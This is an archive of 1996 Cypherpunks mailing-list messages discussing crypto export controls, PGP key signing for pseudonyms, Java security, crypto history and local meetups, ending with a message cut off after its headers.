From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 25 Jan 1996 01:31:06 +0800
To: cypherpunks@toad.com
Subject: Free speech and written rights.
Message-ID: <199601241624.IAA23975@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 PM 1/24/96 +0800, Bruce Murphy wrote:

> Which brings me to another point. At least [Americans] *have* a free
> speech bit in your constitution. While it's generally considered a
> right [in Australia], legally that's not really good enough.

About twenty or thirty years ago, there was big debate on in Australia
on whether Australia should have a bill of rights.

The natural rights crowd popped up from obscurity and vigorously opposed
a bill of rights.  They successfully argued that if a bill of 
rights were written down on paper, these rights would then become 
mere creations of the courts.  This same concern is voiced in Article nine
of the American bill of rights.

In my judgement, America is reasonably free despite having a bill of rights,
rather than because of a bill of rights.

The American nation derived its cohesion from the ideology of liberty, not
from a race or religion.  This is the reason America has a bill of rights,
and this is the reason it remains somewhat free despite possessing a bill
of rights.

Despite this debate and referendum in Australia, the government has 
been sneaking some rights into the Australian constitution by 
various stratagems, and I think that this will have the effect of
undermining liberty.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Fri, 26 Jan 1996 04:33:48 +0800
To: Benjamin Renaud <br@scndprsn.Eng.Sun.COM>
Subject: Re: Hack Java
In-Reply-To: <199601240001.QAA25104@springbank.Eng.Sun.COM>
Message-ID: <Pine.3.89.9601240858.A6438-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Benjamin Renaud wrote:

> Yes. And if you also let an intruder in your house, have them sit at
> your computer with your newborn child in the room and go on vacation,
> things can get really, really nasty.

I guess that wu-ftp never was distributed with security holes.  Never 
heard of anyone distributing maliscious lookalike packages.  How many 
folks do you think downloaded the linux-JDK and use it without checking 
it out first.  That takes care of the compiler.  And distributing bad 
netscape or other browsers is childs play.  So I guess your newborn is 
relevant.

Stick to your belief that Java is secure because, darn it, it just would 
be hard for anyone to do bad things with it.  Please.

> 
> -- Benjamin
>    Java Products Group
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Thu, 25 Jan 1996 00:19:38 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <3105FBFC.4DC9@netscape.com>
Message-ID: <199601241509.JAA26060@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

>  I can see two practical ways to build a netscape product outside
>the US.  The first is to export the source code for the Navigator
>with the crypto code removed.  All of the calls to crypto would
>have to be removed as well.  I've heard some people claim that the
>government could come after us on the grounds that we were taking
>part in a conspiracy to export strong crypto.

Didn't Netscape already promise to remove the hooks? It seems to me all of
the major software players are already in bed with the government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Thu, 25 Jan 1996 02:21:55 +0800
To: cypherpunks@toad.com
Subject: San Diego Cpunks Physical Meeting
Message-ID: <2.2.32.19960124145536.006b5a94@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  ....
will be in conjunction with USENIX "birds of feather" session titled
"Remailers & Cypherpunk".  

Where: San Diego Mariott Hotel and Marina, 333 West Harbor Drive.
Date : 1/25/96
Time : 6:30 - 8:30

SORRY for the late notice.  I spaced the announcement.  Hope you can join us.

Thursday, January 25, 1996

   Invitation to all Cypherpunks to join the San Diego crowd at this special
session lead by our very own Lance Cottrell.  Get the latest update of Lance
Cottrell's anonymous e-mail server, "mixmaster", exchange keys, and discuss
other topical subjects.  If you are in to what's happening on the list,
encryption, privacy, this is the place to be.

   The group may retire somewhere else after 8:30 to continue with other CP
related issues, so join us.

   Don't forget to bring your public key  fingerprint and two forms of
identification.  If you can figure out how to get it on the back of a
business card, that would be cool.  

   Drop me a note if you plan to attend.


See you there!


     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Thu, 25 Jan 1996 00:27:16 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Zimmermann Telegram (crypto history)
In-Reply-To: <199601240336.WAA11471@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960124101611.13539A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Perry E. Metzger wrote:

> 
> It was the Zimmermann Telegram, actually, and it was a dispatch from
> the Germans to the Mexicans trying to promise them most of the
> southwest in exchange for being allies against the U.S. (which wasn't
> yet in the war). The Brits intercepted and decoded it and released it,
> which forced the U.S. into World War I.
> 

Why is it that I seem to recall that one of the responses by a govt. 
official to the intercept was the infamous diplomatic quote

"Gentlemen do not read other gentlemen's mail"

Ah, would that this sentiment were more common in government circles 
today (sigh) . . . . 


C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@CS.Berkeley.EDU>
Date: Thu, 25 Jan 1996 03:17:59 +0800
To: cypherpunks@toad.com
Subject: Guess what I found...
Message-ID: <199601241824.KAA01604@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Guess what I found in my mailbox this morning:

A cheque (that's check for those Americans out there) for $500 from
Netscape Comm. Corp.  It seems they decided to split a "Bugs Bounty"
prize between Dave and me retroactively for the PRNG thing. :-)

   - Ian "This may turn out to be a good day..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 25 Jan 1996 03:06:58 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d67ad2c263c30f9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:17 1/24/96, Timothy C. May wrote:

>The usual issue: That if a foreign-originated product even appears to be a
>standard (so far, none have been), and includes strong crypto, then the NSA
>and other agencies will simply change the rules. Thus, if extremely strong
>crypto from "Netscape-Zurich" starts to have a significant market presense
>in the U.S., then some law will be passed to restrict it.

I agree. The reason for enforcing ITAR is to keep good crypto of the
*domestic* market. If ITAR no longer accomplishes that, new laws will be
passed.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 25 Jan 1996 04:23:54 +0800
To: Christian Wettergren <crypto@midex.com>
Subject: Re: Hack Java
Message-ID: <199601241905.LAA06733@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:47 1/24/96 +0100, Christian Wettergren wrote:
>(In my darker moments, I feel that the whole field of computer security
>is in a major crisis. Ever heard of the Emperor's New Clothes? ;-))

We reduce the problem of an infected Java Interpreter to the previously
unsolved problem of virus protection in general.  I think it is possible to
build highly virus resistant systems, but the cost in user retraining will
be huge.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 26 Jan 1996 14:22:59 +0800
To: "Patiwat Panurach  (akira rising)" <pati@ipied.tu.ac.th>
Subject: Are Cypherpunks Influential?
Message-ID: <2.2.32.19960124161017.006d5ba0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 PM 1/24/96 +0700, Patiwat Panurach  (akira rising) wrote:

>Would you call cypherpunks (as a group and as a philosophy) to be
>influential?  Do you think governments listen to us much?  Are they forced
>to listen to us?  Any stuff to support this?  Please give me your comments.

Much more influential than deserved.  We've gotten a lot of press.  

I would say that we are an example of cultural entrepreneurship.  An
entrepreneur makes money by noticing that there is an unexploited difference
between the price of a final product and the sum of the prices of the
factors of its production (discounted to present value).  We noticed that
there is a difference between the social and technical capabilities of
modern math and modern computing on the one hand and the public perception
of those capabilities on the other.  By simply pointing out those mistakes
in public perception and doing some (as little as possible) coding to prove
it, we've gained some publicity.

An example of the gap between perception and reality that we can easily
exploit, I would point to the regulation of broadcasting.  There's a lot of
talk with the telecoms bill about whether and how much broadcasting should
be deregulated but it is obvious to us that it already has been.  

I was thinking of that while doing my mail and listening to the Leader of
the Free World last night via RealAudio 2.0 and KLIF radio in Dallas via
Audionet.  Radio has been deregulated by technological change since
RealAudio appeared last Summer.  TV dereg will follow with the higher
bandwidth.  

All cypherpunks have done is to point out simple facts like this.  Pretty
easy work if you can get it.  

DCF

"My fellow Americans, we must free our nation from the tyranny of "Others
Government" and turn instead to "Self Government".  We must accomplish this
great task not for ourselves, but for the *Children*." -- 10-second SOTU Address





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Jan 1996 01:18:30 +0800
To: cjl <cjl@welchlink.welch.jhu.edu>
Subject: Re: Zimmermann Telegram (crypto history)
In-Reply-To: <Pine.SOL.3.91.960124101611.13539A-100000@welchlink.welch.jhu.edu>
Message-ID: <199601241616.LAA13409@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



cjl writes:
> Why is it that I seem to recall that one of the responses by a govt. 
> official to the intercept was the infamous diplomatic quote
> 
> "Gentlemen do not read other gentlemen's mail"

It wasn't. That was in response to the entire Yardley "Black Chamber"
incident.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 25 Jan 1996 04:32:12 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <199601241920.LAA09269@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:28 1/24/96 -0800, Lucky Green wrote:
>I agree. The reason for enforcing ITAR is to keep good crypto of the
>*domestic* market. If ITAR no longer accomplishes that, new laws will be
>passed.

I think this is likely to be an oversimplification.  While there are
probably a number of people in e.g. FBI, DEA, DOJ who want to restrict
domestic crypto, I suspect there are also a number of people in e.g. NSA
who are sincerly interested in using SIGINT to protect the US from foreign
threats and want strong domestic crypto as part of that protection.

As always, public policy is a compromise between competing interests
(INSIDE the beltway).  However, the current policy is a holdover from the
days when strong crypto was a closely held trade secret.  Since this
assumption is no longer true, the policy becomes more and more
disfunctional every day.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Thu, 25 Jan 1996 02:20:21 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Who would sign Lucky Green's key?
In-Reply-To: <v02120d57ad2b890610eb@[192.0.2.1]>
Message-ID: <31066e6104dd002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Thu, 25 Jan 1996 01:38:23 +0800
To: cypherpunks@toad.com
Subject: Associating Local Port Number to PID
Message-ID: <2.2.32.19960124164913.006a5fa0@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks,

I'm working on a program for UNIX (SVR4, Solaris 2.4) systems that needs to
associate PID with local TCP/IP port number, so as to pass session keys
accordingly to already running processes. This sounds like such an obviously
needed association that someone must have done it already.

Pointers to code would be best, but any references would be helpful (e.g.,
the appropriate /dev/kmem data structure(s), offset(s), etc.). If necessary,
the program is allowed to be in any group (e.g., "sys" to get at /dev/kmem)
and may even run as root, as a last resort. I see no reason for the latter,
however. Running set-gid to "sys" is sufficient for netstat(1) and ps(1) and
I think is the upper bound for process privilege that I would need.

Thanks in advance.

                                        Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Thu, 25 Jan 1996 05:04:52 +0800
To: cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <2.2.32.19960124195005.006b9940@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:33 PM 1/24/96 -0500, Jonathan Rochkind wrote:

>If, on the other hand, I sign "Toxic Avenger"'s key, then what benefit is
>this for third parties?  Since Toxic Avenger is, by intention, _not_ linked
>to a real person, I'm not saying that I feel confident that this key really
>belongs to any particular real person.  What am I saying?

Over time, some nyms take on a distinct identity of their own. In fact, some
do it very quickly, a with the neo-Nazi twits now arguing in favor of
rec.music.white-power over on news.groups, some with distinct "voices". The
thought, therefore, as I imagine it would be "You don't know I am in person,
but you can count on me to be who I am, with this style and set of views,
and I say that this guy is another actual person with the same."

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 25 Jan 1996 01:57:19 +0800
To: cme@tis.com
Subject: Re: [local] Report on Portland Cpunks meeting
Message-ID: <43073.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Wed, 24 Jan 1996 00:32:37 -0800,
  shamrock@netcom.com (Lucky Green)  writes:

> How do they verify that the person confirming the fingerprint is indeed
> the person supposedly owning the key?

It is pretty hard, that is one of the reasons the web-o-trust is broken.
You can make it better by requiring the person to actually use
the key, which proves that he/she has the passphrase.

At the last key signing at the DC-area cypherpunks meeting, I told
everyone my name was Boris Badanov. Even tho the key's userid
said pfarrell@netcom.com.

Carl Ellison suggests that the signature should have a much weaker meaning,
roughly: "The person owning the secret key associated with this public
key's tag has characteristic X." Obviously X could be "claims to be Pat"

Thus if Lucky gives me a key, I don't know what his/her real name is,
and don't care. All I have to do is see them actually sign something
I give him/her with the key.  Of course we need to rule out
man-in-the-middle attacks. For me, I would buy off on watching the
signing on a standalone laptop while I watch from accross the room.


Interesting atack: Assume there is a chain of keys, with
Lucky feeding keys to Klaus inside the laptop. I'd be signing
what I thought was Lucky's key, but it was really Klaus'.
Of course "Lucky" would have to have the secret passphrase for both
Lucky's and Klaus' keys.  It isn't clear to me if this is an
important case.

Equally questionable are tricks such as using an IR or wireless
transmitter to send my test data to another computer so that the
chain of MITM can be longer.


Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Fri, 26 Jan 1996 12:30:34 +0800
To: mixmaster@anon.alias.net
Subject: Re: None
Message-ID: <9601241720.AB13251@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Nobody writes:
>In article <Pine.LNX.3.91.960123192018.1008D-100000@zifi.genetics.utah.edu> 
>zinc <zinc@zifi.genetics.utah.edu> writes:
>> i got this in the mail this morning.  here's another blatant case 
>> of illegal export.  names and exact addresses removed to protect the 
>> clueless.
>
>Why exactly did you post this message?  I personally don't mind, but
>am just curious.

Why exactly did YOU post this message?  I personally dont mind, but am just 
curious.

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Thu, 25 Jan 1996 02:10:06 +0800
To: cypherpunks@toad.com
Subject: "Concryption" Prior Art
Message-ID: <v02130500ad2bb2004086@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



I haven't read the supposed Concryption patent so I don't know
what the claim structure is. But if they truly claim the right
to do encryption and compression simultaneously, then I've got
some prior art that should knock out such a broad claim. The
paper is "A Redundancy Reducing Cipher" (Cryptologia, May 88).
It's not very secure, but it does do some manner of encryption
at the same time as compressing a file with a Huffman-like
system. The journal is found in many university libraries so it
should be easy to produce a solid counterclaim.

If anyone has the plaintext to the Concryption patent (5479512),
I would like to read it.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Jan 1996 02:22:18 +0800
To: cypherpunks@toad.com
Subject: Underground Radio
Message-ID: <199601241732.MAA06899@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For hams and other techno-libertines, The NY Times reports 
today on underground radio stations and bucking the FCC and 
global techno-tyrant-winner-takes-alls.


http://www.nytimes.com/96/01/24/early/underground-radio.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 25 Jan 1996 03:44:58 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Crippled Notes export encryption
Message-ID: <v01520c0aad2c16d83824@[199.227.1.222]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 1/23/96, you wrote:
>The problem is whether you can separate the functionality of what you're
>exporting sufficiently from what you're contracting out that the exported
>material isn't a "component of a cryptosystem"; it's tough to do a good bones
>version of code if you're concerned about satisfying both the letter and
>spirit of a law to avoid hassles with the government.  On the other hand,
>if you're as big as IBM or even MIT, sometimes you can do it....

So move 100% of the development overseas.  Pick someplace where the labor
is cheaper (maybe the former Soviet Union, but I don't know what their
crypto export laws are like) and develop 100% of the product overseas.  Put
a notice inside each shrink-wrapped box that "This product was forced to be
written overseas, costing American programmers their jobs, by the
shortsightedness of Congress."


2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joee@li.net (j. ercole)
Date: Thu, 25 Jan 1996 02:27:33 +0800
To: cypherpunks@toad.com
Subject: mouse droppings
Message-ID: <v01510100ad2c1f92daae@[199.173.75.117]>
MIME-Version: 1.0
Content-Type: text/plain


In the march '96 issue of macworld there's a "Viewpoint" reporting on the
progress of the info superhighway.  Privacy and security issues predominate
the text, the primary source of which is larry irving --- "a top
administration adviser on telecommunications."
One issue, "mouse droppings" --- "a trail of every site they visit and for
how long [on the www], was highlighted as an example of existing privacy
regulations falling short of consumer expectations.  Apparently, the
amorphous public is shocked, *SHOCKED* I tell you , to discover that their
service providers are selling the personal preference information to the
highest bidder.  More info in article.
Would some rocket scientist speak to this terrifying mouse droppings issue?


j. ercole <joee@li.net>
ny, usa
pgp public key at: http://www.li.net/~joee/autumn2.html
$$$$$$$$$$$$$$$$********************&&&&&&&&&&&&&&&&&
Stand By---.sig presently being unearthed in regression therapy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Minter <cminter@mipos2.intel.com>
Date: Thu, 25 Jan 1996 05:57:12 +0800
To: jpb@miamisci.org (Joe Block)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <v01520c0aad2c16d83824@[199.227.1.222]>
Message-ID: <199601242052.PAA08155@zws388.sc.intel.com>
MIME-Version: 1.0
Content-Type: text/plain


joe wrote:
> ...  crypto export laws are like) and develop 100% of the product
> overseas.  Put a notice inside each shrink-wrapped box that "This
> product was forced to be written overseas, costing American
> programmers their jobs, by the shortsightedness of Congress."

Better yet, specifically point to those who should be held
accountable and list the names, addresses, email address, etc. of all 
those who are involved.

Even better, where practical build into the software an option (that
you could turn on/off) which would email every piece of information
that you encrypted directly to the congressman as a kind reminder of
their position.  [This is a joke: spamming is not a good way to deal
with the issue.]

-- 
______________________________________________________________________
Corey Minter | cminter@mipos2.intel.com | (408) 765-1714
Views expressed in this message in no way represent Intel (duh). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 25 Jan 1996 04:56:21 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Crippled Notes export encryption
Message-ID: <9601241906.AA00705@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>    I can see two practical ways to build a netscape product outside
>  the US.  The first is to export the source code for the Navigator
>  with the crypto code removed.  All of the calls to crypto would
>  have to be removed as well.  I've heard some people claim that the
>  government could come after us on the grounds that we were taking
>  part in a conspiracy to export strong crypto.

Why not just print out all of the source code to Navigator (crypto and all)  
in a nice OCR font?  Paper is exportable.  Then you would 'only' have to scan  
it back in and debug it.

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 27 Jan 1996 01:29:01 +0800
To: tighe@spectrum.titan.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601241509.JAA26060@softserv.tcst.com>
Message-ID: <3106A21E.33E3@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike Tighe wrote:
> 
> Jeff Weinstein writes:
> 
> >  I can see two practical ways to build a netscape product outside
> >the US.  The first is to export the source code for the Navigator
> >with the crypto code removed.  All of the calls to crypto would
> >have to be removed as well.  I've heard some people claim that the
> >government could come after us on the grounds that we were taking
> >part in a conspiracy to export strong crypto.
> 
> Didn't Netscape already promise to remove the hooks? It seems to me all of
> the major software players are already in bed with the government.

  What do you mean by "promise to remove the hooks"?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Nobody" <mixmaster@anon.alias.net>
Date: Thu, 25 Jan 1996 04:49:50 +0800
To: dmiskell@envirolink.org.cypherpunks@toad.com
Subject: None
Message-ID: <199601241930.NAA09159@fuqua.fiftysix.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9601241720.AB13251@envirolink.org> Daniel Miskell <DMiskell@envirolink.org> writes:

> Mr. Nobody writes:

Dr. Nobody, to you.

> >In article <Pine.LNX.3.91.960123192018.1008D-100000@zifi.genetics.utah.edu> 
> >zinc <zinc@zifi.genetics.utah.edu> writes:
> >> i got this in the mail this morning.  here's another blatant case 
> >> of illegal export.  names and exact addresses removed to protect the 
> >> clueless.
> >
> >Why exactly did you post this message?  I personally don't mind, but
> >am just curious.
> 
> Why exactly did YOU post this message?  I personally dont mind, but am just 
> curious.

I thought it was pretty clear from my message:  curiosity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 25 Jan 1996 03:11:12 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Articles re Crypto
Message-ID: <Pine.OSF.3.91.960124132557.28243A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


FYI
In the January issue of InfoCanada, the front page has what amounts to a 
press release on Digital Equipment's Digital Internet Personal Tunnel for 
Windows 95. There is also info on a companian product for Unix. I am 
trying to get some information on this. Has anyone heard of this technology?

In the January 18th 96 issue of EDN, Pg 57 has an article about secure 
wireless designs. In this article they talk about securing devices such 
as garage-door openers, and keyless entry systems for cars and buildings. 
It is a little shy on cryptographic info, but they do talk about crypto 
applications for these products.

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 25 Jan 1996 03:49:14 +0800
To: cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <ad2be4eb00021004ee75@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 PM 01/23/96, Bruce Baugh wrote:
>The nym signing is an idle thought of mine. I have a nym key which is, at
>the moment, signed only by itself. I know friends of mine have nym accounts.
>if we could assemble a group of folks whom I can trust enough to link the
>nym and myself, it'd be nice to add some more signatures to the nym key, and
>vice versa.

I don't understand--what would signatures on a nym's key be good for?  If I
sign your key named "Bruce Baugh", I'm basically saying that I feel
confident that this key really _does_ belong to Bruce Baugh.  Others see my
signature, and say "Jonathan, he's a groovy guy, if he feels confident that
this belons to Bruce, well, he's probably gotten the fingerprint directly
from Bruce in person, and I'm happy to use this key to send mail to Bruce."

If, on the other hand, I sign "Toxic Avenger"'s key, then what benefit is
this for third parties?  Since Toxic Avenger is, by intention, _not_ linked
to a real person, I'm not saying that I feel confident that this key really
belongs to any particular real person.  What am I saying?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 25 Jan 1996 06:19:11 +0800
To: cypherpunks@toad.com
Subject: Signing nyms' keys (Was: Report on Portland Cpunks...)
In-Reply-To: <2.2.32.19960124195005.006b9940@mail.teleport.com>
Message-ID: <9601242142.AA19654@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bruce Baugh writes:
> >If, on the other hand, I sign "Toxic Avenger"'s key, then what benefit is
> >this for third parties?  Since Toxic Avenger is, by intention, _not_ linked
> >to a real person, I'm not saying that I feel confident that this key really
> >belongs to any particular real person.  What am I saying?

> Over time, some nyms take on a distinct identity of their own. [...] The
> thought, therefore, as I imagine it would be "You don't know I am in person,
> but you can count on me to be who I am, with this style and set of views,
> and I say that this guy is another actual person with the same."

So are you saying that by signing a nym's key, you're asserting that you
know _the individual(s) behind the nym_?  If so, would this association
not weaken the anonymity of the nym whose key you've signed?

Furthermore, by signing a nym's key you place yourself at risk.  If you
sign the nym's key with your own key -- or sign using the key of your
own nym, and that nym is subsequently "outed" -- then anyone wishing to
find the individual(s) behind any nym whose key you've signed can
attempt to coerce you into revealing this information, since you have
claimed to know it.

- --
Martin Janzen           janzen@idacom.hp.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQand23Fsi8cupgZAQGmqQQAk7bRYJNxhsw9xHDgoL7fEiZ7faLDeuR9
bYEYnj7tZRWMRaVudEn1G3tsaHF7MS/DuOPRWci6v3dQ742Y8amlqytGWcdpNLn+
qR5RtRvKyDaWR0pi3j+WQ6y8y0WyFrVk1z8/cFKVQWfZvgs1Zjs6R87DWreiN2hr
1Ywm0AA+BIg=
=4phF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 25 Jan 1996 04:25:54 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: DEC Digital Internet Tunnel test server
In-Reply-To: <Pine.OSF.3.91.960124132557.28243A-100000@nic.wat.hookup.net>
Message-ID: <199601241843.NAA01971@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim Philp writes:
> In the January issue of InfoCanada, the front page has what amounts to a 
> press release on Digital Equipment's Digital Internet Personal Tunnel for 
> Windows 95. There is also info on a companian product for Unix. I am 
> trying to get some information on this. Has anyone heard of this technology?

DEC had a booth at RSADSC last week. I chatted with the reps. there during my
sticker collection tour. They had run out of brochures for the tunnel
product when I arrived, but I was directed to a web site that features some
demo kits and a public tunnelling server using their product. I haven't really
looked at it yet, so I don't have an opinion to offer.

http://www.spitbrook.destek.com/

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQZ9qynaAKQPVHDZAQFuuwf+NKuclk1UubZ+Meuo6lBxku6LBYG6jBeL
HNRvY7LcwF9K5DpFzUs6zmPPaegLfQN85gwCR4tS+AitF3r4AdWEZOy6EwCBOjk7
Im3/FMLvi8W9R8V7uXAG8GiO2p9VLI7ybgnWKvQeFZIGXFomO6kWBl6klXlw4A1t
MX0dOFBCJeC+4r3wf6t53Rv2CJFBl2b/IkIWhJFq598we/t7AOCVbWeTXRwTAneW
W/Q9W0pTeHIPLRl2B65kVdn17HnmGFFa/L8H4U0k9OAGJILx462QGVjsDQlerNgg
ba5sb7LtQfAYhN17EvWUZgcuqhX/tiPU/rm/agjku4xperYsVAFgYA==
=yE6d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 25 Jan 1996 04:15:45 +0800
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: re: [local] Report on Portland Cpunks meeting
In-Reply-To: <ad2be4eb00021004ee75@[132.162.233.188]>
